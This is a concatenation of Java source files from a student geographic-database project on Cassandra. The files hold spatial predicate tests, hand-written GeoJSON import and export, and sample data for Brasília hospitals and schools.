System.out.println("banco vazio");
return "banco vazio";
}
System.out.println("geometrias se tocam:");
for(int i=0;i<lista_geo.size()-1;i++){
Geo geo=lista_geo.get(i);
for(int j=i+1;j<lista_geo.size();j++){
Geo geo2=lista_geo.get(j);
if (Intersecta(geo.getGeometria(),geo2.getGeometria())){
System.out.println(geo.getId()+" "+geo2.getId());
lista.add(geo);
lista.add(geo2);
// j=lista_geo.size();
}
}
}
return Geometry2GeoJson(lista,null);
}
public String testeOverlap(){
List<Geo> lista_geo = null;
List<Geo> lista = new ArrayList<Geo>();
try {
lista_geo = ExportarBanco();
} catch (ClassNotFoundException e1) {
e1.printStackTrace();
} catch (NullPointerException e1) {
e1.printStackTrace();
}
if(lista_geo.isEmpty()){
System.out.println("banco vazio");
return "banco vazio";
}
System.out.println("geometrias se sobrepoe:");
for(int i=0;i<lista_geo.size()-1;i++){
Geo geo=lista_geo.get(i);
for(int j=i+1;j<lista_geo.size();j++){
Geo geo2=lista_geo.get(j);
if (Sobrepoe(geo.getGeometria(),geo2.getGeometria())){
System.out.println(geo.getId()+" "+geo2.getId());
lista.add(geo);
lista.add(geo2);
//j=lista_geo.size();
}
}
}
return Geometry2GeoJson(lista,null);
}
public String testeTouch(){
List<Geo> lista_geo = null;
List<Geo> lista = new ArrayList<Geo>();
try {
lista_geo = ExportarBanco();
} catch (ClassNotFoundException e1) {
e1.printStackTrace();
} catch (NullPointerException e1) {
e1.printStackTrace();
}
if(lista_geo.isEmpty()){
System.out.println("banco vazio");
return "banco vazio";
}
System.out.println("geometrias se tocam:");
for(int i=0;i<lista_geo.size()-1;i++){
Geo geo=lista_geo.get(i);
for(int j=i+1;j<lista_geo.size();j++){
Geo geo2=lista_geo.get(j);
if (Toca(geo.getGeometria(),geo2.getGeometria())){
System.out.println(geo.getId()+" "+geo2.getId());
lista.add(geo);
lista.add(geo2);
}
}
}
return Geometry2GeoJson(lista,null);
}
public String testeWithin(){
List<Geo> lista_geo = null;
List<Geo> lista = new ArrayList<Geo>();
try {
lista_geo = ExportarBanco();
} catch (ClassNotFoundException e1) {
e1.printStackTrace();
} catch (NullPointerException e1) {
e1.printStackTrace();
}
if(lista_geo.isEmpty()){
System.out.println("banco vazio");
return "banco vazio";
}
System.out.println("geometrias dentro");
for(int i=0;i<lista_geo.size()-1;i++){
Geo geo=lista_geo.get(i);
for(int j=i+1;j<lista_geo.size();j++){
Geo geo2=lista_geo.get(j);
if (Dentro(geo.getGeometria(),geo2.getGeometria())){
System.out.println(geo.getId()+" "+geo2.getId());
lista.add(geo);
//j=lista_geo.size();
}
if (Dentro(geo2.getGeometria(),geo.getGeometria())){
System.out.println(geo2.getId()+" "+geo.getId());
lista.add(geo2);
//j=lista_geo.size();
}
}
}
return Geometry2GeoJson(lista,null);
}
public static void MostrarPontos(Polygon c){
Point2D[] p2d;
Point2D p2;
int x;
p2d=c.getCoordinates2D();
System.out.println("p2d.length: "+String.valueOf(p2d.length));
for(x=0;x<p2d.length;x++){
p2=p2d[x];
System.out.println("p2: "+String.valueOf(p2.x)+" "+String.valueOf(p2.y));
}System.out.println();
}
public static void MostrarAreaDistancia(Geometry c){
System.out.println("distancia: "+String.valueOf(c.calculateLength2D()) );
System.out.println("area: "+String.valueOf(c.calculateArea2D()) );
System.out.println();
}
/****************************************************************************************/
//////////basico
private static boolean Toca(Geometry a, Geometry b){
SpatialReference sr = null;//= new SpatialReference();
ProgressTracker pt = null;//= new ProgressTracker();
SpatialReference.create(4326);
boolean toca=false;
if(a!=null && b!=null)
toca = OperatorTouches.local().execute(a,b,sr,pt);
else
System.out.println("uma das geometrias é nula");
if(toca){
System.out.println("as geometrias se tocam");
return true;
}else{System.out.println("as geometrias NO se tocam");}
return false;
}
private static boolean Dentro(Geometry a, Geometry b){
//a dentro de b
SpatialReference sr = null;//= new SpatialReference();
ProgressTracker pt = null;//= new ProgressTracker();
SpatialReference.create(4326);
boolean dentro=false;
if(a!=null && b!=null)
dentro = com.esri.core.geometry.OperatorWithin.local().execute(a, b, sr, pt);
else
System.out.println("uma das geometrias é nula");
if(dentro){
System.out.println(" 1º ---> 2º");
return true;
}else{System.out.println(" 1º -/-> 2º");
}
return false;
}
private static boolean Cruza(Geometry a, Geometry b){
SpatialReference sr = null;//= new SpatialReference();
ProgressTracker pt = null;//= new ProgressTracker();
SpatialReference.create(4326);
boolean cruza=false;
if(a!=null && b!=null)
cruza = OperatorCrosses.local().execute(a,b,sr,pt);
else
System.out.println("uma das geometrias é nula");
if(cruza){
System.out.println("as geometrias se cruzam");
return true;
}else{System.out.println("as geometrias NÃO se cruzam");}
return false;
}
private static boolean Intersecta(Geometry a, Geometry b){
SpatialReference sr = null;//= new SpatialReference();
ProgressTracker pt = null;//= new ProgressTracker();
SpatialReference.create(4326);
boolean intersecta=false;
if(a!=null && b!=null)
intersecta = OperatorIntersects.local().execute(a,b,sr,pt);
else
System.out.println("uma das geometrias é nula");
if(intersecta){
System.out.println("as geometrias se intersectam");
return true;
}else{System.out.println("as geometrias NÃO se intersectam");}
return false;
}
private static boolean Disjunto(Geometry a, Geometry b){
SpatialReference sr = null;//= new SpatialReference();
ProgressTracker pt = null;//= new ProgressTracker();
SpatialReference.create(4326);
boolean disjunto=false;
if(a!=null && b!=null)
disjunto = OperatorDisjoint.local().execute(a,b,sr,pt);
else
System.out.println("uma das geometrias é nula");
if(disjunto){
System.out.println("as geometrias disjuntas");
return true;
}else{System.out.println("as geometrias juntas");}
return false;
}
private static boolean Sobrepoe(Geometry a, Geometry b){
SpatialReference sr = null;//= new SpatialReference();
ProgressTracker pt = null;//= new ProgressTracker();
SpatialReference.create(4326);
boolean sobrepoe=false;
if(a!=null && b!=null)
sobrepoe = OperatorOverlaps.local().execute(a,b,sr,pt);
else
System.out.println("uma das geometrias é nula");
if(sobrepoe){
System.out.println("as geometrias se sobrepoe");
return true;
}else{System.out.println("as geometrias NÃO se sobrepoe");}
return false;
}
private static boolean Contem(Geometry a, Geometry b){
SpatialReference sr = null;//= new SpatialReference();
ProgressTracker pt = null;//= new ProgressTracker();
SpatialReference.create(4326);
boolean contem=false;
if(a!=null && b!=null)
contem = OperatorContains.local().execute(a,b,sr,pt);
else
System.out.println("uma das geometrias é nula");
if(contem){
//A Contem B
System.out.println("a geometria está contida");
return true;
}else{System.out.println("a geometria NÃO não está contida");}
return false;
}
/////////
//OK
//recebe um arquivo com caminho completo do tipo geojson
//ou recebe uma string contendo o geojson
//adiciona todos as geometrias no banco
public List<Geo> GeoJson2Geometry(String arquivo) throws IOException, JSONException{
String id=null;
String type=null;
String coordinates=null;
Propriedade<String> properties= new Propriedade<String>();
String geojson="";
geo = null;
Geometry geometry;
List<Geo> lista_geo=new ArrayList<Geo>();
BufferedReader buffer = null;
//(String arquivo) pode ser a string geojson e si ou o caminho para o arquivo
if(new File(arquivo+".geo.json").exists() || new File(arquivo+".geojson").exists()||new File(arquivo).exists()){
if(new File(arquivo+".geojson").exists())
buffer = new BufferedReader(new InputStreamReader(new FileInputStream(arquivo+".geojson"), "UTF-8"));
// buffer=new BufferedReader(new FileReader(arquivo+".geojson"));
else if(new File(arquivo+".geo.json").exists())
buffer = new BufferedReader(new InputStreamReader(new FileInputStream(arquivo+".geo.json"), "UTF-8"));
else
buffer = new BufferedReader(new InputStreamReader(new FileInputStream(arquivo), "UTF-8"));
while(buffer.ready()){
geojson+=buffer.readLine();
}
buffer.close();
}else
geojson=arquivo;
if(geojson==null)
throw new NullPointerException();
geojson = geojson.replaceAll( "\t", "" );
geojson = geojson.replaceAll( "\n", "" );
geojson = geojson.replaceAll( "\r", "" );
geojson = geojson.replaceAll( "\f", "" );
String[] geostrings=geojson.split("\\},\\{");
//i=0=> {"type":"*Feature*Collection
//i=1 => Collection","features":[\t{\t"type": "*Feature*
for(int i=0; i<geostrings.length;i++){
id=getId(geostrings[i]);
type=getType(geostrings[i]);
properties=getProperties(geostrings[i]);
coordinates=getCoordinates(geostrings[i]);
if(id==null){//pega outro valor pra id e.g. "name", "nome", propriedades[2],propriedades[1]...
if(properties.tamanho()==0){
//throw new NullPointerException("geometria sem id e sem propiedades");
//continue;//geometrias sem id e propriedade serão ignoradas
id="noid";
properties.put("properties", "null");
}
else if(properties.tamanho()==1){
switch(properties.getV()){
case "yes":
id=properties.getP();
break;
default :
id=properties.getV();
break;
}
}
else{
for(int j=0;j<properties.tamanho();j++){
if (properties.getP(j).equals("name")){id=properties.getV(j); j=properties.tamanho();}
else if(properties.getP(j).equals("nome")){id=properties.getV(j); j=properties.tamanho();}
else if(properties.getP(j).equals("highway")){id=properties.getP(j); j=properties.tamanho();}
}
if(id==null){id=properties.getV();} //pega primeira propriedade
}
}
//System.out.println("----------------IMPORT GEOJSON----------------\n"+geostrings[i]+"\n"+i+"\n"+id+"\n"+type+"\n\n");
if(coordinates==null){
System.err.println("Erro ao importar geojson: Coordenadas mau definidas.");
return null;
}else if(id==null){
System.err.println("Erro ao importar geojson: id mau definido.");
return null;
}else if(type == null){
System.err.println("Erro ao importar geojson: tipo mau definido.");
return null;
}else{
ProgressTracker pt = null;
geo=new Geo();
switch(type){
case "Point":
geo.setGeometria((Point) OperatorImportFromGeoJson.local().execute
(com.esri.core.geometry.GeoJsonImportFlags.geoJsonImportDefaults,
Geometry.Type.Point, coordinates, pt).getGeometry());
break;
case "LineString":
Polyline ls= (Polyline) OperatorImportFromGeoJson.local().execute
(com.esri.core.geometry.GeoJsonImportFlags.geoJsonImportDefaults,
Geometry.Type.Polyline, coordinates, pt).getGeometry();
/*if(ls.getPathCount()>1){
System.err.println("geojson possui geometrias desconhecidas...");
return null;
}*/
geo.setGeometria(ls);
break;
case "Polygon":
geometry=OperatorImportFromGeoJson.local().execute
(com.esri.core.geometry.GeoJsonImportFlags.geoJsonImportDefaults,
Geometry.Type.Polygon, coordinates, pt).getGeometry();
Polygon pg= (Polygon)geometry;
/*if(pg.getPathCount()>1){
System.err.println("geojson possui geometrias desconhecidas...");
return null;
}*/
geo.setGeometria(pg);
break;
case "MultiPoint":
geo.setGeometria((MultiPoint)OperatorImportFromGeoJson.local().execute
(com.esri.core.geometry.GeoJsonImportFlags.geoJsonImportDefaults,
Geometry.Type.MultiPoint, coordinates, pt).getGeometry());
break;
case "MultiLineString":
Polyline mls= (Polyline)OperatorImportFromGeoJson.local().execute
(com.esri.core.geometry.GeoJsonImportFlags.geoJsonImportDefaults,
Geometry.Type.Polyline, coordinates, pt).getGeometry();
/*if(mls.getPathCount()<2){
System.err.println("geojson possui geometrias desconhecidas...");
return null;
}*/
geo.setGeometria(mls);
break;
case "MultiPolygon":
Polygon mpg= (Polygon)OperatorImportFromGeoJson.local().execute
(com.esri.core.geometry.GeoJsonImportFlags.geoJsonImportDefaults,
Geometry.Type.Polygon, coordinates, pt).getGeometry();
/*if(mpg.getPathCount()<2){
System.err.println("geojson possui geometrias desconhecidas...");
return;
}*/
geo.setGeometria(mpg);
break;
default:
System.err.println("geojson possui geometrias desconhecidas..."+ type);
return null;
}
}
geo.setTipo(type);
geo.setPropriedades(properties);
geo.setId(id);
lista_geo.add(geo);
//if (properties!=null)
//properties.esvaziar();
}
return lista_geo;
}
//OK
//recebe uma lista de geometrias e exporta para geojson como arquivo dentra da pasta especificada
//ou retorna como string
public String Geometry2GeoJson(List<Geo> lista,String path){
String geojson="{\"type\":\"FeatureCollection\",\"features\":[\n";
List geometrias = new ArrayList();
String geometria = null;
int i=0;
Propriedade<String> prop;
//cada consulta adiciona um uma geometria ao geojson
while (!lista.isEmpty()){
//tipo
//tipo coordendas
if(lista.get(0).getGeometria()!=null){
if(lista.get(0).getTipo().equals("Line")){
//Line não é um tipo geojson
Line l=(Line) lista.get(0).getGeometria();
Polyline pl= new Polyline();
pl.startPath(l.getStartX(),l.getStartY());
pl.lineTo(l.getEndX(), l.getEndY());
lista.get(0).setTipo("Polyline");
lista.get(0).setGeometria(pl);
}
/*if(lista.get(0).getTipo().equals("Polygon")){
if (lista.get(0).getGeometria().isMultiVertex(0)){
System.out.println("");
}
}*/
/* geojson+="\t{\t\"type\": \"Feature\",\n";
geojson+="\t\t\"geometry\":";
geojson+=OperatorExportToGeoJson.local().execute(lista.get(0).getGeometria());
geojson+=",\n";
*/
geometria="{\"type\": \"Feature\",\"geometry\":";
geometria+=OperatorExportToGeoJson.local().execute(lista.get(0).getGeometria())+",";
//propriedades
if(!lista.get(0).getPropriedades().vazio()){
prop=lista.get(0).getPropriedades();
geometria+= "\"properties\": {";//"tabela" de informações
//geojson+= "\t\t\"properties\": {";//"tabela" de informações
while(!prop.vazio()){
geometria+="\""+prop.getP()+"\":\""+prop.getV()+"\"";
prop.remove();//de cima
if(!prop.vazio())
geometria+=",";
}
geometria+="}}";
//geojson+="}\n\t}";
}else
geometria+="}";
lista.remove(0);
if(!lista.isEmpty())
geometria+=",";
}else
lista.remove(0);
geometrias.add(geometria);
}
//salvar arquivo
try {
BufferedWriter bufferedWriter = null;
if(path.substring(path.length()-4, path.length()).contains("json")){
if (path!=null){
bufferedWriter = new BufferedWriter(
new OutputStreamWriter(
new FileOutputStream(path), "utf-8"));
}
}else{
if (path!=null){
bufferedWriter = new BufferedWriter(
new OutputStreamWriter(
new FileOutputStream(path+"\\out.geojson"), "utf-8"));
}
}
bufferedWriter.write(geojson);
while(!geometrias.isEmpty()){
bufferedWriter.write(geometrias.get(0).toString()+"\n");
geometrias.remove(0);
}
bufferedWriter.write("]}");
bufferedWriter.close();
}catch (IOException e) {
e.printStackTrace();
}
return geojson;
}
public void ImportarBanco(List<Geo> lista_geo){
BancoDados.InserirGeo(lista_geo);
}
public List<Geo> ExportarBanco() throws ClassNotFoundException, NullPointerException{
return BancoDados.BuscarGeo(0,null);
}
//public Geo BuscarBanco(String nome) throws ClassNotFoundException, NullPointerException{
//return BancoDados.BuscarGeo(nome);
//}
private String getCoordinates(String geojson){
int x,indice=0,inicio=-1,fim=0;
indice=geojson.indexOf("\"coordinates\"");
if(indice==-1)
return null;
for(x=indice;x>=0;x--){
if(geojson.charAt(x)=='{'){
inicio=x;
x=-1;
}
}
if(inicio<0)
return null;
for(x=indice;x<geojson.length();x++){
if(geojson.charAt(x)=='}'){
fim=x+1;
x=geojson.length();
}
}
return geojson.substring(inicio, fim);
}
private String getType(String geojson){
int x,indice=0,inicio=0,fim=0;
indice=geojson.indexOf("\"type\"");
if(indice==-1)
return null;
for(x=indice;x<geojson.length();x++){
if(geojson.charAt(x)==':'){
inicio=x;
x=geojson.length();
}
}
if(inicio==0)
return null;
for(x=inicio;x<geojson.length();x++){
if(geojson.charAt(x)=='"'){
inicio=x+1;
x=geojson.length();
}
}
for(x=inicio+1;x<geojson.length();x++){
if(geojson.charAt(x)=='"'){
fim=x;
x=geojson.length();
}
}
String tipo=geojson.substring(inicio, fim);
if(!tipo.equals("Point") &&
!tipo.equals("LineString") &&
!tipo.equals("Polygon") &&
!tipo.equals("MultiPoint") &&
!tipo.equals("MultiLineString") &&
!tipo.equals("MultiPolygon"))
return getType(geojson.substring(indice+4,geojson.length()));
else
return tipo;
}
String getId(String geojson){
int x,indice=0,inicio=0,fim=0;
indice=geojson.indexOf("\"id\"");
if(indice==-1)
return null;
for(x=indice;x<geojson.length();x++){
if(geojson.charAt(x)==':'){
inicio=x;
x=geojson.length();
}
}
if(inicio==0)
return null;
for(x=inicio;x<geojson.length();x++){
if(geojson.charAt(x)=='"'){
inicio=x+1;
x=geojson.length();
}
}
for(x=inicio+1;x<geojson.length();x++){
if(geojson.charAt(x)=='"'){
fim=x;
x=geojson.length();
}
}
try{
return geojson.substring(inicio, fim);
}
catch(Exception e){
e.printStackTrace();
return null;
}
}
Propriedade<String> getProperties(String geojson){
Propriedade<String> prop = new Propriedade<String>();;
String propriedade;
int x,indice=0,inicio=-1,fim=0;
indice=geojson.indexOf("properties");
if(indice==-1)
return null;
for(x=indice;x<geojson.length();x++){
if(geojson.charAt(x)=='{'){
inicio=x;
x=geojson.length();
}
}
if(inicio<0)
return null;
for(x=indice;x<geojson.length();x++){
if(geojson.charAt(x)=='}'){
fim=x+1;
x=geojson.length();
}
}
String propriedades=geojson.substring(inicio, fim);
propriedades=propriedades.replaceAll(",\"", "\",\"");
propriedades=propriedades.replaceAll("\",\"", "\"\",\"\"");
String[] lista_prop=propriedades.split("\"\",\"");
//String[] lista_prop=propriedades.split("\",\"");
for(int i=0; i<lista_prop.length;i++){
indice=lista_prop[i].indexOf("\":\"");
if(indice==-1)
continue;
for(x=0;x<lista_prop[i].length();x++){
if(lista_prop[i].charAt(x)=='"'){
inicio=x;
x=lista_prop[i].length();
}
}
if(inicio<0)
continue;
/*for(x=inicio+1;x<lista_prop[i].length();x++){
if(lista_prop[i].charAt(x)=='"'){
fim=x+1;
x=lista_prop[i].length();
}
}*/
propriedade=lista_prop[i].substring(inicio+1, indice);
for(x=lista_prop[i].length()-1;x>=0;x--){
if(lista_prop[i].charAt(x)=='"'){
fim=x;
x=-1;
}
}
if(fim<0)
continue;
/*for(x=fim-1;x>=0;x--){
if(lista_prop[i].charAt(x)=='"'){
inicio=x;
x=-1;
}
}*/
try{
prop.put(propriedade,lista_prop[i].substring(indice+3, fim));
}
catch(Exception e){
e.printStackTrace();
}
}
return prop;
}
public void SalvarGeoJson(String path,String geojson){
FileOutputStream fos;
try {
fos = new FileOutputStream(path);
fos.write(geojson.getBytes());
fos.close();
} catch (FileNotFoundException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
}
}<file_sep>/BDGCassandra/src/Cassandra/gis/geoprocessing/GettingStarted.java
package Cassandra.gis.geoprocessing;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
import java.util.UUID;
import org.json.JSONException;
import com.esri.core.geometry.Geometry;
import com.esri.core.geometry.Line;
import com.esri.core.geometry.Point;
import com.esri.core.geometry.Point2D;
import com.esri.core.geometry.Polygon;
import com.esri.core.geometry.Polyline;
import com.esri.core.geometry.MultiPoint;
import com.esri.core.geometry.ProgressTracker;
import com.esri.core.geometry.SpatialReference;
import Cassandra.gis.db.BDgeo;
import Cassandra.gis.db.Geo;
import Cassandra.gis.db.Propriedade;
import Cassandra.servico.consultaopiniao.BD;
import Cassandra.servico.consultaopiniao.Estabelecimento;
public class GettingStarted {
private static Funcoes func;
private static BD BancoDados;
public GettingStarted() {
}
public static void main(String[] args){
func= new Funcoes(new BDgeo("127.0.0.1", "geometry"));
float antes=System.currentTimeMillis();
System.out.println("antes: "+System.currentTimeMillis()/1000);
/* for(int i=0;i<12;i++){
ImportarGeoJson("C:\\Users\\Acer\\Desktop\\testeGeoJson\\df\\df"+String.valueOf(i)+".geojson");
}
ExportarGeometria("C:\\Users\\Acer\\Desktop\\testeGeoJson\\df\\df.geojson");
System.out.println((float)(System.currentTimeMillis()-antes)/1000+"segundos de busca no banco");
System.out.println(System.currentTimeMillis()/1000+"segundos de exportação do banco");
testeBD();
testeOperadores();
testeBDgeo();
*/
funcoes_geoespaciais();
System.out.println((float)(System.currentTimeMillis()-antes)/1000+"segundos de inserção no banco");
}
public static void testeBD(){
BancoDados= new BD();
int x;
UUID y,z;
List <UUID> yy = new ArrayList <UUID>();
List <UUID> zz = new ArrayList <UUID>();
y = UUID.randomUUID();yy.add(y);
BancoDados.inserirEstabelecimento(y, -15.79225, -47.83938, "Hospital", "Minha localizacao");y = UUID.randomUUID();yy.add(y);
BancoDados.inserirEstabelecimento(y, -15.767938, -47.874228, "Escola", "Centro de Ensino Medio Asa Norte");y = UUID.randomUUID();yy.add(y);
BancoDados.inserirEstabelecimento(y, -15.808065, -47.909539, "Escola", "Centro de Ensino Medio Elefante Branco");y = UUID.randomUUID();yy.add(y);
BancoDados.inserirEstabelecimento(y, -15.7830155, -47.938376, "Escola", "Centro Educacional 01 do Cruzeiro");y = UUID.randomUUID();yy.add(y);
BancoDados.inserirEstabelecimento(y, -15.796561, -47.938454, "Escola", "Centro Educacional 02 do Cruzeiro Novo");y = UUID.randomUUID();yy.add(y);
BancoDados.inserirEstabelecimento(y, -15.827537, -47.917211, "Escola", "Centro de Ensino Fundamental 04 de Brasilia");y = UUID.randomUUID();yy.add(y);
BancoDados.inserirEstabelecimento(y, -15.75597, -47.87861, "Escola", "Centro de Ensino Medio Paulo Freire");y = UUID.randomUUID();yy.add(y);
BancoDados.inserirEstabelecimento(y, -15.82669, -47.92002, "Hospital", "Hospital Geral de Brasilia");y = UUID.randomUUID();yy.add(y);
BancoDados.inserirEstabelecimento(y, -15.82382, -47.897158, "Hospital", "Hospital Regional da Asa Sul");y = UUID.randomUUID();yy.add(y);
BancoDados.inserirEstabelecimento(y, -15.800837, -47.888676, "Hospital", "Hospital de Base do Distrito Federa");y = UUID.randomUUID();yy.add(y);
BancoDados.inserirEstabelecimento(y, -15.772453, -47.873429, "Hospital", "Hospital Universitário de Brasilia");y = UUID.randomUUID();yy.add(y);
BancoDados.inserirEstabelecimento(y, -15.785671, -47.882864, "Hospital", "Hospital Regional da Asa Norte");
for(x=0;x<yy.size();x++){
Estabelecimento est=BancoDados.buscarEstabelecimento(yy.get(x));
if(est.getDescricao().equals("Escola")){
BancoDados.inserirTipoAvaliacao (yy.get(x),"Escola", "Qual sua nota para o atendimento desta escola?");
BancoDados.inserirTipoAvaliacao (yy.get(x),"Escola", "Qual sua nota para os profissionais desta escola?");
BancoDados.inserirTipoAvaliacao (yy.get(x),"Escola", "Qual sua nota para a limpeza desta escola?");
BancoDados.inserirTipoAvaliacao (yy.get(x),"Escola", "Qual sua nota para a organização desta escola?");
BancoDados.inserirTipoAvaliacao (yy.get(x),"Escola", "Qual sua nota para a pontualidade dos profissionais desta escola?");
}
else if(est.getDescricao().equals("Hospital")){
BancoDados.inserirTipoAvaliacao (yy.get(x),"Hospital", "Qual sua nota para o atendimento deste hospital?");
BancoDados.inserirTipoAvaliacao (yy.get(x),"Hospital", "Qual sua nota para os profissionais deste hospital?");
BancoDados.inserirTipoAvaliacao (yy.get(x),"Hospital", "Qual sua nota para a limpeza deste hospital?");
BancoDados.inserirTipoAvaliacao (yy.get(x),"Hospital", "Qual sua nota para a organização deste hospital?");
BancoDados.inserirTipoAvaliacao (yy.get(x),"Hospital", "Qual sua nota para a pontualidade dos profissionais deste hospital?");
}
}
for(x=0;x<11;x++){
z = UUID.randomUUID();
zz.add(z);
//BancoDados.inserirUsuario("000.111.222-"+String.valueOf(x), String.valueOf(x)+String.valueOf(x+1)+String.valueOf(x+2), "Matheus"+String.valueOf(x), "<EMAIL>"+String.valueOf(x)+"@<EMAIL>");
}
BancoDados.inserirUsuario("000.111.222-1","senha", "Matheus", "<EMAIL>");
BancoDados.inserirUsuario("000.111.222-2","senha", "Joao", "<EMAIL>");
BancoDados.inserirUsuario("000.111.222-3","senha", "Maria", "<EMAIL>");
BancoDados.inserirUsuario("000.111.222-4","senha", "Joana", "<EMAIL>");
long antes =System.currentTimeMillis();
System.out.println("antes: "+antes);
for(x=0;x<0;x++){
BancoDados.inserirAvaliacao(yy.get(x%yy.size()),UUID.randomUUID(),"Escola n-"+String.valueOf(x),"Escola","Matheus"+String.valueOf(x),(((double)x+1)*0.5) % 5.0);
}
long depois =System.currentTimeMillis();
System.out.println("antes: "+depois);
System.out.println((float)(depois-antes)/1000+"segundos de inserçãono banco");
}
public static void testeOperadores(){
System.out.println("start teste");
func.InicializarTestes("C:\\Users\\Acer\\Desktop\\testeGeoJson\\teste.json");
func.SalvarGeoJson("C:\\Users\\Acer\\Desktop\\testeGeoJson\\contem.json",func.testeContain());
System.out.println("testeContain");
func.SalvarGeoJson("C:\\Users\\Acer\\Desktop\\testeGeoJson\\cruza.json",func.testeCrosses());
System.out.println("testeCrosses");
func.SalvarGeoJson("C:\\Users\\Acer\\Desktop\\testeGeoJson\\disjunto.json",func.testeDisjoint());
System.out.println("testeDisjoint");
func.SalvarGeoJson("C:\\Users\\Acer\\Desktop\\testeGeoJson\\intersecta.json",func.testeIntersect());
System.out.println("testeIntersect");
func.SalvarGeoJson("C:\\Users\\Acer\\Desktop\\testeGeoJson\\sobrepoe.json",func.testeOverlap());
System.out.println("testeOverlap");
func.SalvarGeoJson("C:\\Users\\Acer\\Desktop\\testeGeoJson\\toca.json",func.testeTouch());
System.out.println("testeTouch");
func.SalvarGeoJson("C:\\Users\\Acer\\Desktop\\testeGeoJson\\dentro.json",func.testeWithin());
System.out.println("testeWithin");
}
public static void testeBDgeo(){
//testar o armazenamento de cada tipo de representação geografica
/* ponto OK
* linha(1 linha : 2 pontos) OK
* poligono OK
* multiponto OK
* polilinha(1~m)(m linhas: n pontos) OK
* multipoligono OK
*/
try{
//banco
BDgeo BancoDados= new BDgeo("127.0.0.1", "geometry");
//variaveis de teste
Point p= new Point(8.34,56.23);
MultiPoint mp = new MultiPoint();
Line l= new Line();
Polyline pl = new Polyline();
Polygon pg = new Polygon();
Propriedade<String> propriedades= new Propriedade<String>();
List<Geo> list_geo= new ArrayList<Geo>();
Geo geo= new Geo();
// propriedades.put("País", "Brasil");
// propriedades.put("info","eu moro aki");
// BancoDados.InserirGeo((float)9.5, "minha casa", propriedades);
geo.setGeometria(p);
geo.setId("minha casa");
geo.setPropriedades(propriedades);
list_geo.add(geo);
//ponto
propriedades.put("País", "Brasil");
propriedades.put("info","eu moro aki");
BancoDados.InserirGeo(list_geo);
list_geo.clear();
geo.setGeometria(mp);
geo.setId("meus vizinhos conhecidos");
geo.setPropriedades(propriedades);
list_geo.add(geo);
//multiponto
mp.add(new Point(9.0,9.0));
mp.add(new Point(8.0,8.0));
mp.add(new Point(7.0,7.0));
mp.add(new Point(6.0,6.0));
mp.add(new Point(5.0,5.0));
propriedades.put("País", "Brasil");
propriedades.put("info","eu moro aki");
BancoDados.InserirGeo(list_geo);
list_geo.clear();
//Linha
geo.setGeometria(l);
geo.setId( "<NAME>");
geo.setPropriedades(propriedades);
list_geo.add(geo);
l.setStart(p);
l.setEnd(new Point(1.0, 1.0));
propriedades.put("País", "Brasil");
propriedades.put("info","eu moro aki");
propriedades.put("comprimento de b1", String.valueOf(l.calculateLength2D()));
BancoDados.InserirGeo(list_geo);
list_geo.clear();
geo.setGeometria(pl);
geo.setId("meu quarteirão");
geo.setPropriedades(propriedades);
list_geo.add(geo);
//polilinha
pl.startPath(0.0,1.0);pl.lineTo(0.0,2.0);pl.lineTo(0.0,3.0);
pl.startPath(1.0,1.0);pl.lineTo(1.0,2.0);pl.lineTo(1.0,3.0);
pl.startPath(0.0,4.0);pl.lineTo(0.0,5.0);pl.lineTo(0.0,6.0);
pl.startPath(1.0,4.0);pl.lineTo(1.0,5.0);pl.lineTo(1.0,6.0);
propriedades.put("País", "Brasil");
propriedades.put("info","eu moro aki");
propriedades.put("comprimento: ",String.valueOf(pl.calculateLength2D()));
BancoDados.InserirGeo(list_geo);
list_geo.clear();
geo.setGeometria(pg);
geo.setId("minha quadra");
geo.setPropriedades(propriedades);
list_geo.add(geo);
//poligono
pg.startPath(0.0,0.0);pg.lineTo(0.0,2.0);pg.lineTo(2.0,2.0);pg.lineTo(2.0,0.0);
pg.startPath(2.0,0.0);pg.lineTo(2.0,2.0);pg.lineTo(4.0,2.0);pg.lineTo(4.0,0.0);
propriedades.put("País", "Brasil");
propriedades.put("info","eu moro aki");
propriedades.put("comprimento: ",String.valueOf(pg.calculateLength2D()));
propriedades.put("area: ",String.valueOf(pg.calculateArea2D()));
BancoDados.InserirGeo(list_geo);
list_geo.clear();
}
catch(NullPointerException e){e.printStackTrace();}
}
public static void ImportarGeoJson(String path){
try {
List<Geo> retorno =func.GeoJson2Geometry(path);
func.ImportarBanco(retorno);
System.out.println(path);
} catch (IOException | JSONException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
public static void ExportarGeometria(String path){
try {
List<Geo> retorno =func.ExportarBanco();
System.out.println("fim da busca ");
String resultado=func.Geometry2GeoJson(retorno, path);
System.out.println("fim da exportação");
} catch ( ClassNotFoundException | NullPointerException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
public static void funcoes_geoespaciais(){
//func.comprimento_total("highway","C:\\Users\\Acer\\Desktop\\testeGeoJson\\teste1.geojson");
func.localizar_raio(-47.88322,-15.79401, 10000, "school", "C:\\Users\\Acer\\Desktop\\testeGeoJson\\teste2.geojson");
try{
//func.porcentagem_area("Universidade de Brasília - Campus Universitário Darcy Ribeiro","C:\\Users\\Acer\\Desktop\\testeGeoJson\\teste3.geojson");
}catch(Exception f){}
}
}
<file_sep>/README.md
# BDG_Cassandra
Banco de Dados Geográfico utilizando banco NoSQL Cassandra
https://bdm.unb.br/handle/10483/17205
<file_sep>/BDGCassandra/src/Cassandra/gis/db/BDgeo.java
package Cassandra.gis.db;
import com.datastax.driver.core.Cluster;
import com.datastax.driver.core.Row;
import com.datastax.driver.core.Session;
import com.datastax.driver.core.UDTValue;
import com.esri.core.geometry.Geometry;
import com.esri.core.geometry.Point;
import com.esri.core.geometry.Point2D;
import com.esri.core.geometry.Line;
import com.esri.core.geometry.Polygon;
import com.esri.core.geometry.Polyline;
import com.google.common.reflect.TypeToken;
import com.esri.core.geometry.MultiPoint;
import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.Set;
/*
* geometria list< frozen< list< frozen<POINT> >>>
* POINT(x FLOAT, y FLOAT) : tipo definido pelo usuario
* frozen<> : utilizado para tipos definidos pelo usuario
* frozen<POINT> : tipo básico geométrico: deriva linha,LineString, poligono,etc
* frozen< list< frozen<POINT>>> : listas de pontos define uma geometria (1 ou + pontos)
* list< frozen< list< frozen<POINT>>>> : lista de geometrias(estritamente do mesmo tipo):multiponto, multilinha, multipoligono
*
* ponto: [[(x2,y2)]]
